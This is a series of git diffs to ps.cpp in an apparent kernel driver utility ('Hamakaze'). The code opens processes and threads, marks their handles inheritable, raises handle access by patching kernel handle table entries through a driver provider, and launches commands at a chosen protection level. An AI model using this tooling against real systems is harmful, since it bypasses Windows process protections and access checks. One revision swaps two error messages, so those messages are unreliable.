+                        printf_s("[!] Failed to set thread handle %p to THREAD_ALL_ACCESS.\r\n", hThread);
                         err++;
                     }
                 }
                 else {
-                    printf_s("[!] Failed to set thread handle %p as inheritable.\n", hThread);
+                    printf_s("[!] Failed to set thread handle %p as inheritable.\r\n", hThread);
                     err++;
                 }
             }
@@ -1050,10 +1080,10 @@ BOOL KDUOpenAndPatchThreads(KDU_CONTEXT* Context, ULONG_PTR TargetProcessId) {
             // target process found and processed, returning from the function
             free(buffer);
             if (err > 0) {
-                printf_s("[-] Warning: Continuing despite having %i erroneous thread handle(s) out of %i in %llu.\n", err, threadCount, TargetProcessId);
+                printf_s("[-] Warning: Continuing despite having %i erroneous thread handle(s) out of %i in %llu.\r\n", err, threadCount, TargetProcessId);
             }
             else {
-                printf_s("[+] Success: Opened and patched all %i thread handle(s) in %llu.\n", threadCount, TargetProcessId);
+                printf_s("[+] Success: Opened and patched all %i thread handle(s) in %llu.\r\n", threadCount, TargetProcessId);
             }
             return TRUE;
         }
@@ -1068,7 +1098,7 @@ BOOL KDUOpenAndPatchThreads(KDU_CONTEXT* Context, ULONG_PTR TargetProcessId) {
     // target process not found -> return FALSE
     free(buffer);
     supPrintfEvent(kduEventError,
-        "[!] Target process %llu not found to open and patch threads.\n", TargetProcessId);
+        "[!] Target process %llu not found to open and patch threads.\r\n", TargetProcessId);
     return FALSE;
 }
 
@@ -1103,8 +1133,8 @@ BOOL KDURunCommandInheritee(
                 supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary process handle acquisition.\r\n");
                 return FALSE;
             }
-            if (!KDUOpenProcess(Context, (HANDLE)TargetProcessId, PROCESS_ALL_ACCESS, &hTargetProc)) {
-                printf_s("[!] Failed to open target process %llu via user- and kernel-mode.", TargetProcessId);
+            if (!KDUOpenProcess(Context, (HANDLE)TargetProcessId, PROCESS_ALL_ACCESS, &hTargetProc) || hTargetProc == NULL) {
+                printf_s("[!] Failed to open target process %llu via user- and kernel-mode.\r\n", TargetProcessId);
                 return FALSE;
             }
             printf_s("[+] Opened target process %llu via KDUOpenProcess and got hProc %p\r\n", TargetProcessId, hTargetProc);
@@ -1120,14 +1150,16 @@ BOOL KDURunCommandInheritee(
     // check if handle is inheritable, if not, set it to be inheritable
     if (!KDUSetHandleInheritable(hTargetProc)) {
         supPrintfEvent(kduEventError, 
-            "[!] Not continuing due to failure in setting handle inheritance.\n");
+            "[!] Not continuing due to failure in setting handle inheritance.\r\n");
         return FALSE;
     }
 
+    ULONG_PTR ProcessHandleTable = 0; // save for later patches, if needed
+
     // check if handle has PROCESS_FULL_ACCESS rights (requesting FULL_ACCESS may still lead to stripped access)
-	if (!KDUSetAccessRights(Context, hTargetProc, PROCESS_ALL_ACCESS)) {
+	if (!KDUSetAccessRights(Context, hTargetProc, PROCESS_ALL_ACCESS, &ProcessHandleTable)) {
 		supPrintfEvent(kduEventError, 
-            "[!] Not continuing due to failure in setting handle access rights.\n");
+            "[!] Not continuing due to failure in setting handle access rights.\r\n");
 		return FALSE;
 	}
 
@@ -1135,8 +1167,8 @@ BOOL KDURunCommandInheritee(
     if (OpenThreads) {
         printf_s("[+] Opening all threads of target process %llu...\n", TargetProcessId);
 
-        if (!KDUOpenAndPatchThreads(Context, TargetProcessId)) {
-            printf_s("[!] Continuing despite not being able to open and patch threads...\n");
+        if (!KDUOpenAndPatchThreads(Context, TargetProcessId, &ProcessHandleTable)) {
+            printf_s("[!] Continuing despite not being able to open and patch threads...\r\n");
         }
     }
 
@@ -1177,7 +1209,7 @@ BOOL KDURunCommandInheritee(
 
     if (PPLLevel >= 7) {
         PPLLevel = 7;
-        printf_s("[!] Capped the PPL level at 7\n");
+        printf_s("[!] Capped the PPL level at 7\r\n");
     }
 
     // patch PPL and resume
@@ -1198,7 +1230,7 @@ BOOL KDURunCommandInheritee(
         dwThreadResumeCount = ResumeThread(pi.hThread);
         if (dwThreadResumeCount != 1) {
             supPrintfEvent(kduEventError, 
-                "[!] Failed to resume process: %lu | 0x%lX\n", dwThreadResumeCount, GetLastError());
+                "[!] Failed to resume process: %lu | 0x%lX\r\n", dwThreadResumeCount, GetLastError());
             TerminateProcess(pi.hProcess, 0);
             CloseHandle(pi.hProcess);
             CloseHandle(pi.hThread);

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -992,35 +992,16 @@ BOOL KDUOpenAndPatchThreads(
     _In_ ULONG_PTR TargetProcessId,
     _Inout_opt_ ULONG_PTR* ProcessHandleTable)
 {
-    ULONG bufferSize = 0x10000;
-    PVOID buffer = NULL;
-    NTSTATUS status = STATUS_INFO_LENGTH_MISMATCH;
 
-    // dynamically allocate and fetch system process/thread information
-    do {
-        buffer = malloc(bufferSize);
-        if (!buffer) {
-            supPrintfEvent(kduEventError, 
-                "[!] Out of memory allocating system info buffer.\r\n");
-            return FALSE;
-        }
-
-        status = NtQuerySystemInformation(SystemProcessInformation, buffer, bufferSize, &bufferSize);
-
-        if (status == STATUS_INFO_LENGTH_MISMATCH) {
-            free(buffer);
-            bufferSize *= 2; // double it and give it to the next loop
-        }
-        else if (status != STATUS_SUCCESS) {
-            free(buffer);
-            supPrintfEvent(kduEventError, 
-                "[!] NtQuerySystemInformation failed. Status: 0x%08X\r\n", status);
-            return FALSE;
-        }
-    } while (status == STATUS_INFO_LENGTH_MISMATCH);
+    // get SYSTEM_PROCESS_INFORMATION, contains threads per proc
+    PVOID procBuffer = supGetSystemInfo(SystemProcessInformation);
+    if (!procBuffer) {
+        supPrintfEvent(kduEventError, "Cannot allocate process list\r\n");
+        return FALSE;
+    }
 
     // traverse the system information structures to find TargetProcessId
-    PSYSTEM_PROCESS_INFORMATION pCurrentProcess = (PSYSTEM_PROCESS_INFORMATION)buffer;
+    PSYSTEM_PROCESS_INFORMATION pCurrentProcess = (PSYSTEM_PROCESS_INFORMATION)procBuffer;
     int threadCount = 0;
     int err = 0;
 
@@ -1078,7 +1059,7 @@ BOOL KDUOpenAndPatchThreads(
             }
 
             // target process found and processed, returning from the function
-            free(buffer);
+            supHeapFree(procBuffer);
             if (err > 0) {
                 printf_s("[-] Warning: Continuing despite having %i erroneous thread handle(s) out of %i in %llu.\r\n", err, threadCount, TargetProcessId);
             }
@@ -1096,7 +1077,7 @@ BOOL KDUOpenAndPatchThreads(
     }
 
     // target process not found -> return FALSE
-    free(buffer);
+    supHeapFree(procBuffer);
     supPrintfEvent(kduEventError,
         "[!] Target process %llu not found to open and patch threads.\r\n", TargetProcessId);
     return FALSE;

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -232,7 +232,7 @@ BOOL KDURunCommandPPL(
 
     dwThreadResumeCount = ResumeThread(pi.hThread);
     if (dwThreadResumeCount != 1) {
-        printf_s("[!] Failed to resume process: %lu | 0x%lX\n", dwThreadResumeCount, GetLastError());
+        printf_s("[!] Failed to resume process: %lu | 0x%lX\r\n", dwThreadResumeCount, GetLastError());
         TerminateProcess(pi.hProcess, 0);
         CloseHandle(pi.hProcess);
         CloseHandle(pi.hThread);
@@ -514,7 +514,7 @@ BOOL KDUControlProcessProtections(
                             sizeof(UCHAR)))
                         {
                             printf_s("[+] Kernel memory read at %p succeeded\r\n", (void*)VirtualAddress);
-                            printf_s("\tNew PsProtection: 0x%02X\n", verifyBuf & 0xff);
+                            printf_s("\tNew PsProtection: 0x%02X\r\n", verifyBuf & 0xff);
                             printProtection(verifyBuf);
                         }
                     }
@@ -951,7 +951,7 @@ BOOL KDUSetHandleInheritable(
         return TRUE;
     }
 	if (!SetHandleInformation(hHandle, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT)) {
-		printf_s("[!] SetHandleInformation failed. Error: %lu\n", GetLastError());
+		printf_s("[!] SetHandleInformation failed. Error: %lu\r\n", GetLastError());
 		return FALSE;
 	}
 	printf_s("[+] Success: Set HANDLE_FLAG_INHERIT on the handle %p.\r\n", hHandle);
@@ -1165,7 +1165,7 @@ BOOL KDURunCommandInheritee(
 
 	// open all process threads if requested, set them to be inheritable and patch to THREAD_ALL_ACCESS
     if (OpenThreads) {
-        printf_s("[+] Opening all threads of target process %llu...\n", TargetProcessId);
+        printf_s("[+] Opening all threads of target process %llu...\r\n", TargetProcessId);
 
         if (!KDUOpenAndPatchThreads(Context, TargetProcessId, &ProcessHandleTable)) {
             printf_s("[!] Continuing despite not being able to open and patch threads...\r\n");

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -1002,20 +1002,21 @@ BOOL KDURunCommandInheritee(
         printf_s("[+] Opened target process %llu with PROCESS_ALL_ACCESS and got hProc %p\r\n", TargetProcessId, hTargetProc);
     }
 
-    // now check if handle has PROCESS_FULL_ACCESS rights (requesting FULL_ACCESS may still lead to stripped access)
-	if (!KDUSetAccessRights(Context, hTargetProc, PROCESS_ALL_ACCESS)) {
-		printf("[!] Not continuing due to failure in setting handle access rights.\n");
-		return FALSE;
-	}
-
-	// check if handle is inheritable, if not, set it to be inheritable
+    // check if handle is inheritable, if not, set it to be inheritable
     if (!KDUSetHandleInheritable(hTargetProc)) {
         printf("[!] Not continuing due to failure in setting handle inheritance.\n");
         return FALSE;
     }
 
+    // check if handle has PROCESS_FULL_ACCESS rights (requesting FULL_ACCESS may still lead to stripped access)
+	if (!KDUSetAccessRights(Context, hTargetProc, PROCESS_ALL_ACCESS)) {
+		printf("[!] Not continuing due to failure in setting handle access rights.\n");
+		return FALSE;
+	}
+
 	// open all process threads if requested, set them to be inheritable and patch to THREAD_ALL_ACCESS
 	if (OpenThreads) {
+		printf("[+] Opening all threads of target process %llu, set inheritable and THREAD_ALL_ACCESS...\n", TargetProcessId);
 		std::vector<HANDLE> threadHandles;
 
 		HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
@@ -1028,18 +1029,33 @@ BOOL KDURunCommandInheritee(
 		if (Thread32First(hThreadSnap, &te32)) {
 			do {
 				if (te32.th32OwnerProcessID == TargetProcessId) {
-					HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);
+					
+                    HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);
                     if (hThread == NULL) {
+                        
                         // fallback, should work for most
 						hThread = OpenThread(THREAD_QUERY_LIMITED_INFORMATION, FALSE, te32.th32ThreadID);
+
+                        if (hThread == NULL) {
+                            printf_s("[-] Target process %llu cannot be opened via user-mode, fallback to KDUOpenProcess()\r\n", TargetProcessId);
+
+							// 2nd fallback also using KDU OpenProcess
+							if (!KDUVerifyProviderCallbacksForOpenProcess(Context)) { // ignore a thread if the provider does not support arbitrary process handle acquisition
+                                printf_s("[-] Warning: Selected provider does not support arbitrary thread handle acquisition, not inheriting thread %lu.\r\n", te32.th32ThreadID);
+                                continue;
+                            }
+                            if (!KDUOpenProcess(Context, (HANDLE)TargetProcessId, THREAD_ALL_ACCESS, &hThread)) {
+                                printf("[-] Warning: Failed to open thread %lu via user- and kernel-mode, not inheriting it.", te32.th32ThreadID);
+                                continue;
+                            }
+                        }
                     }
 					if (hThread == NULL) {
 						printf("[!] Failed to open thread with TID %lu. Error: %lu\n", te32.th32ThreadID, GetLastError());
 						continue;
 					}
-                    if (KDUSetHandleInheritable(hThread)) {
-						threadHandles.push_back(hThread);
-                    } // else ignore the thread if not inheritable, should not happen, if still rip us
+
+					threadHandles.push_back(hThread);
 				}
 			} while (Thread32Next(hThreadSnap, &te32));
             CloseHandle(hThreadSnap);
@@ -1053,11 +1069,23 @@ BOOL KDURunCommandInheritee(
         // check if the thread handles have THREAD_ALL_ACCESS rights, if not, patch it
         int err = 0;
         for (auto& hThread : threadHandles) {
-            if (!KDUSetAccessRights(Context, hThread, THREAD_ALL_ACCESS)) {
+            if (KDUSetHandleInheritable(hThread)) {
+                if (KDUSetAccessRights(Context, hThread, THREAD_ALL_ACCESS)) {
+					printf("[+] Thread handle %p set to THREAD_ALL_ACCESS and inheritable.\n", hThread);
+				}
+				else {
+					printf("[!] Failed to set thread handle %p as inheritable.\n", hThread);
+					err++;
+				}
+            }
+            else {
+				printf("[!] Failed to set thread handle %p to THREAD_ALL_ACCESS.\n", hThread);
                 err++;
             }
         }
-        printf("[-] Continuing despite not having THREAD_ALL_ACCESS on %i out of %llu thread(s).\n", err, threadHandles.size());
+        if (err > 0) {
+            printf("[-] Continuing despite having %i incomplete threads out of %llu thread(s).\n", err, threadHandles.size());
+        }
 	}
 
     STARTUPINFO si;

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -805,7 +805,8 @@ BOOL KDUControlHandleAccess(
 	KDU_EPROCESS_OFFSETS offsets;
 	
     if (!KDUVerifyProviderCallbacksForPsPatch(Context)) {
-		printf_s("[!] Provider does not support required callbacks for handle access control\r\n");
+		supPrintfEvent(kduEventError, 
+            "[!] Provider does not support required callbacks for handle access control\r\n");
         return FALSE;
     }
 
@@ -873,23 +874,28 @@ BOOL KDUControlHandleAccess(
                                     printf_s("[+] Verified: Handle access rights updated to 0x%lX.\r\n", entry.GrantedAccess);
                                 }
                                 else {
-                                    printf_s("[!] Verification failed: Handle access rights are 0x%lX, expected 0x%lX.\r\n", entry.GrantedAccess, NewAccessMask);
+                                    bResult = FALSE; // 
+                                    supPrintfEvent(kduEventError, 
+                                        "[!] Verification failed: Handle access rights are 0x%lX, expected 0x%lX.\r\n", entry.GrantedAccess, NewAccessMask);
                                 }
                             }
                             else {
-                                printf("[!] Failed to read back HandleTableEntry after modification.\r\n");
+                                printf_s("[!] Warning: Failed to read back HandleTableEntry after modification, continuing...\r\n");
                             }
                         }
                         else {
-                            supPrintfEvent(kduEventError, "[!] Failed to modify handle access rights\r\n");
+                            supPrintfEvent(kduEventError, 
+                                "[!] Failed to modify handle access rights\r\n");
                         }
                     }
                     else {
-						supPrintfEvent(kduEventError, "[!] Cannot read HandleTableEntry\r\n");
+						supPrintfEvent(kduEventError, 
+                            "[!] Cannot read HandleTableEntry\r\n");
                     }
 				}
 				else {
-					supPrintfEvent(kduEventError, "[!] Cannot read HandleTableEntry\r\n");
+					supPrintfEvent(kduEventError, 
+                        "[!] Cannot read HandleTableEntry\r\n");
 				}
 			}
 			else {
@@ -916,18 +922,18 @@ BOOL KDUSetHandleInheritable(HANDLE hHandle)
 {
 	DWORD flags = 0;
 	if (!GetHandleInformation(hHandle, &flags)) {
-		printf("[!] GetHandleInformation failed. Error: %lu\n", GetLastError());
+		printf_s("[!] GetHandleInformation failed. Error: %lu\n", GetLastError());
 		return FALSE; // safe exit instead of undefined continuation
 	}
 	if (flags & HANDLE_FLAG_INHERIT) { // already inheritable
-        printf("[+] Ok: The handle %p is already inheritable.\n", hHandle);
+        printf_s("[+] Ok: The handle %p is already inheritable.\n", hHandle);
         return TRUE;
     }
 	if (!SetHandleInformation(hHandle, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT)) {
-		printf("[!] SetHandleInformation failed. Error: %lu\n", GetLastError());
+		printf_s("[!] SetHandleInformation failed. Error: %lu\n", GetLastError());
 		return FALSE;
 	}
-	printf("[+] Success: Set HANDLE_FLAG_INHERIT on the handle %p.\n", hHandle);
+	printf_s("[+] Success: Set HANDLE_FLAG_INHERIT on the handle %p.\n", hHandle);
 	return TRUE;
 }
 
@@ -940,18 +946,18 @@ BOOL KDUSetAccessRights(PKDU_CONTEXT Context, HANDLE hHandle, ACCESS_MASK access
     if (status == STATUS_SUCCESS) {
         POBJECT_BASIC_INFORMATION pBasicInfo = (POBJECT_BASIC_INFORMATION)buf;
         if ((pBasicInfo->GrantedAccess & accessMask) == accessMask) {
-            printf("[+] Ok: The handle %p already has the required rights 0x%lX to the target process.\n", hHandle, accessMask);
+            printf_s("[+] Ok: The handle %p already has the required rights 0x%lX to the target process.\n", hHandle, accessMask);
             return TRUE;
         }
         else {
-            printf("[-] Warning: Handle %p only has access rights: 0x%lX. Attempting to modify...\n", hHandle, pBasicInfo->GrantedAccess);
+            printf_s("[-] Warning: Handle %p only has access rights: 0x%lX. Attempting to modify...\n", hHandle, pBasicInfo->GrantedAccess);
 
             // attempt to modify the handle's access rights using KDUControlHandleAccess
             return KDUControlHandleAccess(Context, GetCurrentProcessId(), hHandle, PROCESS_ALL_ACCESS);
         }
     }
     else {
-        printf("[!] Failed to query handle information with status: 0x%lX\n", status);
+        printf_s("[!] Failed to query handle information with status: 0x%lX\n", status);
         return FALSE;
     }
 }
@@ -988,7 +994,7 @@ BOOL KDURunCommandInheritee(
                 return FALSE;
             }
             if (!KDUOpenProcess(Context, (HANDLE)TargetProcessId, PROCESS_ALL_ACCESS, &hTargetProc)) {
-                printf("[!] Failed to open target process %llu via user- and kernel-mode.", TargetProcessId);
+                printf_s("[!] Failed to open target process %llu via user- and kernel-mode.", TargetProcessId);
                 return FALSE;
             }
             printf_s("[+] Opened target process %llu via KDUOpenProcess and got hProc %p\r\n", TargetProcessId, hTargetProc);
@@ -1003,26 +1009,29 @@ BOOL KDURunCommandInheritee(
 
     // check if handle is inheritable, if not, set it to be inheritable
     if (!KDUSetHandleInheritable(hTargetProc)) {
-        printf("[!] Not continuing due to failure in setting handle inheritance.\n");
+        supPrintfEvent(kduEventError, 
+            "[!] Not continuing due to failure in setting handle inheritance.\n");
         return FALSE;
     }
 
     // check if handle has PROCESS_FULL_ACCESS rights (requesting FULL_ACCESS may still lead to stripped access)
 	if (!KDUSetAccessRights(Context, hTargetProc, PROCESS_ALL_ACCESS)) {
-		printf("[!] Not continuing due to failure in setting handle access rights.\n");
+		supPrintfEvent(kduEventError, 
+            "[!] Not continuing due to failure in setting handle access rights.\n");
 		return FALSE;
 	}
 
 	// open all process threads if requested, set them to be inheritable and patch to THREAD_ALL_ACCESS
 	if (OpenThreads) {
-		printf("[+] Opening all threads of target process %llu, set inheritable and THREAD_ALL_ACCESS...\n", TargetProcessId);
+		printf_s("[+] Opening all threads of target process %llu, set inheritable and THREAD_ALL_ACCESS...\n", TargetProcessId);
 		
         HANDLE threadHandles[MAX_THREADS]; // arbitrary limit
         size_t threadCount = 0;
 
 		HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
 		if (hThreadSnap == INVALID_HANDLE_VALUE) {
-			printf("[!] Failed to create thread snapshot. Error: %lu\n", GetLastError());
+			supPrintfEvent(kduEventError, 
+                "[!] Failed to create thread snapshot. Error: %lu\n", GetLastError());
 			return FALSE;
 		}
 		THREADENTRY32 te32;
@@ -1046,13 +1055,13 @@ BOOL KDURunCommandInheritee(
                                 continue;
                             }
                             if (!KDUOpenProcess(Context, (HANDLE)TargetProcessId, THREAD_ALL_ACCESS, &hThread)) {
-                                printf("[-] Warning: Failed to open thread %lu via user- and kernel-mode, not inheriting it.", te32.th32ThreadID);
+                                printf_s("[-] Warning: Failed to open thread %lu via user- and kernel-mode, not inheriting it.", te32.th32ThreadID);
                                 continue;
                             }
                         }
                     }
 					if (hThread == NULL) {
-						printf("[!] Failed to open thread with TID %lu. Error: %lu\n", te32.th32ThreadID, GetLastError());
+						printf_s("[!] Failed to open thread with TID %lu. Error: %lu\n", te32.th32ThreadID, GetLastError());
 						continue;
 					}
                     
@@ -1068,7 +1077,8 @@ BOOL KDURunCommandInheritee(
             CloseHandle(hThreadSnap);
 		}
 		else {
-			printf("[!] Invalid thread snapshot. Error: %lu\n", GetLastError());
+			supPrintfEvent(kduEventError, 
+                "[!] Invalid thread snapshot. Error: %lu\n", GetLastError());
 			CloseHandle(hThreadSnap);
 			return FALSE;
 		}
@@ -1079,20 +1089,20 @@ BOOL KDURunCommandInheritee(
             HANDLE hThread = threadHandles[i];
             if (KDUSetHandleInheritable(hThread)) {
                 if (KDUSetAccessRights(Context, hThread, THREAD_ALL_ACCESS)) {
-					printf("[+] Thread handle %p set to THREAD_ALL_ACCESS and inheritable.\n", hThread);
+					printf_s("[+] Thread handle %p set to THREAD_ALL_ACCESS and inheritable.\n", hThread);
 				}
 				else {
-					printf("[!] Failed to set thread handle %p as inheritable.\n", hThread);
+				    printf_s("[!] Failed to set thread handle %p to THREAD_ALL_ACCESS.\n", hThread);
 					err++;
 				}
             }
             else {
-				printf("[!] Failed to set thread handle %p to THREAD_ALL_ACCESS.\n", hThread);
+				printf_s("[!] Failed to set thread handle %p as inheritable.\n", hThread);
                 err++;
             }
         }
         if (err > 0) {
-            printf("[-] Continuing despite having %i incomplete threads out of %llu thread(s).\n", err, threadCount);
+            printf_s("[-] Warning: Continuing despite having %i erroneous thread handle(s) out of %llu.\n", err, threadCount);
         }
 	}
 
@@ -1153,7 +1163,8 @@ BOOL KDURunCommandInheritee(
 
         dwThreadResumeCount = ResumeThread(pi.hThread);
         if (dwThreadResumeCount != 1) {
-            printf_s("[!] Failed to resume process: %lu | 0x%lX\n", dwThreadResumeCount, GetLastError());
+            supPrintfEvent(kduEventError, 
+                "[!] Failed to resume process: %lu | 0x%lX\n", dwThreadResumeCount, GetLastError());
             TerminateProcess(pi.hProcess, 0);
             CloseHandle(pi.hProcess);
             CloseHandle(pi.hThread);

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -18,6 +18,8 @@
 *******************************************************************************/
 
 #include "global.h"
+#include <TlHelp32.h>
+#include <vector>
 #include <Dbghelp.h>
 
 typedef BOOL(WINAPI* pfnMiniDumpWriteDump)(
@@ -911,6 +913,57 @@ BOOL KDUControlHandleAccess(
 	return bResult;
 }
 
+BOOL KDUSetHandleInheritable(HANDLE hHandle)
+{
+	DWORD flags = 0;
+	if (!GetHandleInformation(hHandle, &flags)) {
+		printf("[!] GetHandleInformation failed. Error: %lu\n", GetLastError());
+		return FALSE; // safe exit instead of undefined continuation
+	}
+    if (flags & HANDLE_FLAG_INHERIT) {
+        printf("[+] Success: The handle %p is inheritable.\n", hHandle);
+        return TRUE;
+    }
+	if (!SetHandleInformation(hHandle, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT)) {
+		printf("[!] SetHandleInformation failed. Error: %lu\n", GetLastError());
+		return FALSE;
+	}
+	printf("[+] Successfully set HANDLE_FLAG_INHERIT on the handle %p.\n", hHandle);
+	return TRUE;
+}
+
+BOOL KDUSetAccessRights(PKDU_CONTEXT Context, HANDLE hHandle, ACCESS_MASK accessMask)
+{
+    unsigned char buf[sizeof(OBJECT_BASIC_INFORMATION)] = {};
+    ULONG returnLength;
+
+    NTSTATUS status = NtQueryObject(hHandle, ObjectBasicInformation, buf, sizeof(buf), &returnLength);
+    if (status == STATUS_SUCCESS) {
+        POBJECT_BASIC_INFORMATION pBasicInfo = (POBJECT_BASIC_INFORMATION)buf;
+        if ((pBasicInfo->GrantedAccess & accessMask) == accessMask) {
+            printf("[+] The handle %p already has the required rights 0x%lX to the target process.\n", hHandle, accessMask);
+            return TRUE;
+        }
+        else {
+            printf("[-] Warning: Handle %p only has access rights: 0x%lX. Attempting to modify...\n", hHandle, pBasicInfo->GrantedAccess);
+
+            // attempt to modify the handle's access rights using KDUControlHandleAccess
+            if (KDUControlHandleAccess(Context, GetCurrentProcessId(), hHandle, PROCESS_ALL_ACCESS)) {
+                printf("[+] Success: Modified the handle's access rights to requested rights 0x%lX.\n", accessMask);
+                return TRUE;
+            }
+            else {
+                printf("[!] Failed to modify the handle's access rights.\n");
+                return FALSE;
+            }
+        }
+    }
+    else {
+        printf("[!] Failed to query handle information with status: 0x%lX\n", status);
+        return FALSE;
+    }
+}
+
 /*
 * KDURunCommandDup
 *
@@ -923,6 +976,7 @@ BOOL KDURunCommandInheritee(
     _In_ PKDU_CONTEXT Context,
     _In_ LPWSTR CommandLine,
     _In_ ULONG_PTR TargetProcessId,
+    _In_ BOOL OpenThreads,
     _In_ ULONG_PTR PPLLevel)
 {
 
@@ -931,28 +985,13 @@ BOOL KDURunCommandInheritee(
 		return FALSE;
 	}
 
+	// open the target process with PROCESS_ALL_ACCESS and set the handle to be inheritable
     HANDLE hTargetProc;
     if (KDUOpenProcess(Context, (HANDLE)TargetProcessId, PROCESS_ALL_ACCESS, &hTargetProc)) {
-        DWORD flags = 0;
-
-		printf_s("[+] Opened target process with PID %llu\r\n", TargetProcessId);
-        if (GetHandleInformation(hTargetProc, &flags)) {
-            if (flags & HANDLE_FLAG_INHERIT) {
-                printf("[+] Success: The handle %p is inheritable.\n", hTargetProc);
-            }
-            else {
-                printf("[-] Warning: The handle %p is not inheritable, attempting to set inheritance flag...\n", hTargetProc);
-                if (!SetHandleInformation(hTargetProc, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT)) {
-                    printf("[!] Failed to set inheritance flag. Error: %lu\n", GetLastError());
-                    return FALSE;
-                }
-                else {
-                    printf("[+] Successfully toggled HANDLE_FLAG_INHERIT on the handle %p.\n", hTargetProc);
-                }
-            }
-        }
-        else {
-            printf("[!] GetHandleInformation failed. Error: %lu\n", GetLastError());
+		printf_s("[+] Opened target process with PID %llu and got hProc %p\r\n", TargetProcessId, hTargetProc);
+        if (!KDUSetHandleInheritable(hTargetProc)) {
+			printf("[!] Not continuing due to failure in setting handle inheritance.\n");
+            return FALSE;
         }
     }
     else {
@@ -961,32 +1000,57 @@ BOOL KDURunCommandInheritee(
     }
 
     // check if handle has PROCESS_FULL_ACCESS rights
-    unsigned char buf[sizeof(OBJECT_BASIC_INFORMATION)] = {};
-    ULONG returnLength;
+	if (!KDUSetAccessRights(Context, hTargetProc, PROCESS_ALL_ACCESS)) {
+		printf("[!] Not continuing due to failure in setting handle access rights.\n");
+		return FALSE;
+	}
 
-    NTSTATUS status = NtQueryObject(hTargetProc, ObjectBasicInformation, buf, sizeof(buf), &returnLength);
-    if (status == STATUS_SUCCESS) { 
-        POBJECT_BASIC_INFORMATION pBasicInfo = (POBJECT_BASIC_INFORMATION)buf;
-		if ((pBasicInfo->GrantedAccess & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS) {
-			printf("[+] The handle %p has PROCESS_ALL_ACCESS rights to the target process.\n", hTargetProc);
+	// open all process threads if requested, set them to be inheritable and patch to THREAD_ALL_ACCESS
+	if (OpenThreads) {
+        printf("here\n");
+		std::vector<HANDLE> threadHandles;
+
+		HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
+		if (hThreadSnap == INVALID_HANDLE_VALUE) {
+			printf("[!] Failed to create thread snapshot. Error: %lu\n", GetLastError());
+			return FALSE;
+		}
+		THREADENTRY32 te32;
+		te32.dwSize = sizeof(THREADENTRY32);
+		if (Thread32First(hThreadSnap, &te32)) {
+			do {
+				if (te32.th32OwnerProcessID == TargetProcessId) {
+					HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);
+                    if (hThread == NULL) {
+                        // fallback, should work for most
+						hThread = OpenThread(THREAD_QUERY_LIMITED_INFORMATION, FALSE, te32.th32ThreadID);
+                    }
+					if (hThread == NULL) {
+						printf("[!] Failed to open thread with TID %lu. Error: %lu\n", te32.th32ThreadID, GetLastError());
+						continue;
+					}
+                    if (KDUSetHandleInheritable(hThread)) {
+						threadHandles.push_back(hThread);
+                    } // else ignore the thread if not inheritable (rip us)
+				}
+			} while (Thread32Next(hThreadSnap, &te32));
+            CloseHandle(hThreadSnap);
 		}
 		else {
-			printf("[-] Warning: Handle %p only has access rights: 0x%lX. Attempting to modify...\n", hTargetProc, pBasicInfo->GrantedAccess);
-			
-            // attempt to modify the handle's access rights using KDUControlHandleAccess
-			if (KDUControlHandleAccess(Context, GetCurrentProcessId(), hTargetProc, PROCESS_ALL_ACCESS)) {
-				printf("[+] Success: Modified the KDU handle's access rights to PROCESS_ALL_ACCESS.\n");
-			}
-			else {
-				printf("[!] Failed to modify the KDU handle's access rights.\n");
-				return FALSE;
-			}
+			printf("[!] Invalid thread snapshot. Error: %lu\n", GetLastError());
+			CloseHandle(hThreadSnap);
+			return FALSE;
 		}
-    }
-    else {
-        printf("[!] Failed to query handle information with status: 0x%lX\n", status);
-        return FALSE;
-    }
+
+        // check if the thread handles have THREAD_ALL_ACCESS rights, if not, use KDUSetAccessRights
+        int err = 0;
+        for (auto& hThread : threadHandles) {
+            if (!KDUSetAccessRights(Context, hThread, THREAD_ALL_ACCESS)) {
+                err++;
+            }
+        }
+        printf("[!] Continuing despite not having THREAD_ALL_ACCESS on %i thread(s).\n", err);
+	}
 
     STARTUPINFO si;
     PROCESS_INFORMATION pi;

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -920,15 +920,15 @@ BOOL KDUSetHandleInheritable(HANDLE hHandle)
 		printf("[!] GetHandleInformation failed. Error: %lu\n", GetLastError());
 		return FALSE; // safe exit instead of undefined continuation
 	}
-    if (flags & HANDLE_FLAG_INHERIT) {
-        printf("[+] Success: The handle %p is inheritable.\n", hHandle);
+	if (flags & HANDLE_FLAG_INHERIT) { // already inheritable
+        printf("[+] Ok: The handle %p is already inheritable.\n", hHandle);
         return TRUE;
     }
 	if (!SetHandleInformation(hHandle, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT)) {
 		printf("[!] SetHandleInformation failed. Error: %lu\n", GetLastError());
 		return FALSE;
 	}
-	printf("[+] Successfully set HANDLE_FLAG_INHERIT on the handle %p.\n", hHandle);
+	printf("[+] Success: Set HANDLE_FLAG_INHERIT on the handle %p.\n", hHandle);
 	return TRUE;
 }
 
@@ -941,21 +941,14 @@ BOOL KDUSetAccessRights(PKDU_CONTEXT Context, HANDLE hHandle, ACCESS_MASK access
     if (status == STATUS_SUCCESS) {
         POBJECT_BASIC_INFORMATION pBasicInfo = (POBJECT_BASIC_INFORMATION)buf;
